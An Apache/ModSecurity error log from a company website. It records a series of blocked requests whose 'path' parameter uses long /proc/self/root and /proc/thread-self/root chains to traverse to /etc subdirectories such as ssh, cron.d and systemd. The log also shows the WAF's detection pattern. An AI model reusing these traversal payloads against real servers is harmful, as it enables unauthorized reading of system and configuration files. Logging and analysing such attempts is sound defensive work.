[Tue Mar 17 16:20:23.683547 2026] [:error] [pid 2598:tid 140411741927168] [client 74.7.241.31:48686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpdxj0p0SRWAqcjGGHnQAAAwA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:25.136058 2026] [:error] [pid 18380:tid 140411741927168] [client 74.7.241.31:48688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpea4xEDsg_V3ESNZZUAAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:26.435444 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.241.31:48692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpevPqhzTj3BvfDX-VngAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:27.746734 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.241.31:56078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpexj0p0SRWAqcjGGHnwAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:29.650801 2026] [:error] [pid 7437:tid 140411666392832] [client 74.7.241.31:56088] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpfQeiSKl8TjouI-YmBAAAA8k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:30.946735 2026] [:error] [pid 7004:tid 140411590858496] [client 74.7.241.31:56092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpfsU6Sx0TG1YjmQi8iAAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:32.255902 2026] [:error] [pid 7004:tid 140411674785536] [client 74.7.241.31:56108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpgMU6Sx0TG1YjmQi8igAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:34.016937 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:56114] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpgvPqhzTj3BvfDX-VpAAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:34.153566 2026] [:error] [pid 25836:tid 140411725141760] [client 74.7.243.128:33052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpgoh-PF_25v4hFRB5HQAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:20:35.322343 2026] [:error] [pid 29151:tid 140411741927168] [client 74.7.241.31:56116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpg_PqhzTj3BvfDX-VqAAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:36.690365 2026] [:error] [pid 18380:tid 140411725141760] [client 74.7.241.31:56128] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmphK4xEDsg_V3ESNZZUwAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:37.137774 2026] [proxy_fcgi:error] [pid 7004:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:58040] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:20:38.435532 2026] [:error] [pid 29151:tid 140411691570944] [client 74.7.241.31:33340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmphvPqhzTj3BvfDX-VrAAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:39.733579 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:33354] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmphxj0p0SRWAqcjGGHpAAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:41.030266 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.241.31:33366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpiRj0p0SRWAqcjGGHqAAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:42.397414 2026] [:error] [pid 7004:tid 140411741927168] [client 74.7.241.31:33376] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpisU6Sx0TG1YjmQi8jQAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:44.839230 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:33388] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpjBj0p0SRWAqcjGGHrAAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:47.396379 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:33394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpj9a6ubjKNq_cu4YWfgAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:48.904902 2026] [:error] [pid 25836:tid 140411582465792] [client 74.7.241.31:40012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpkIh-PF_25v4hFRB5IAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:50.532915 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.31:40016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpkgeiSKl8TjouI-YmDgAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:51.828110 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.241.31:40032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpkweiSKl8TjouI-YmEAAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:53.164073 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.241.31:40034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmplfPqhzTj3BvfDX-VsQAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:54.476346 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:40050] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmplnIk7brgkOH-rIWZ5wAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
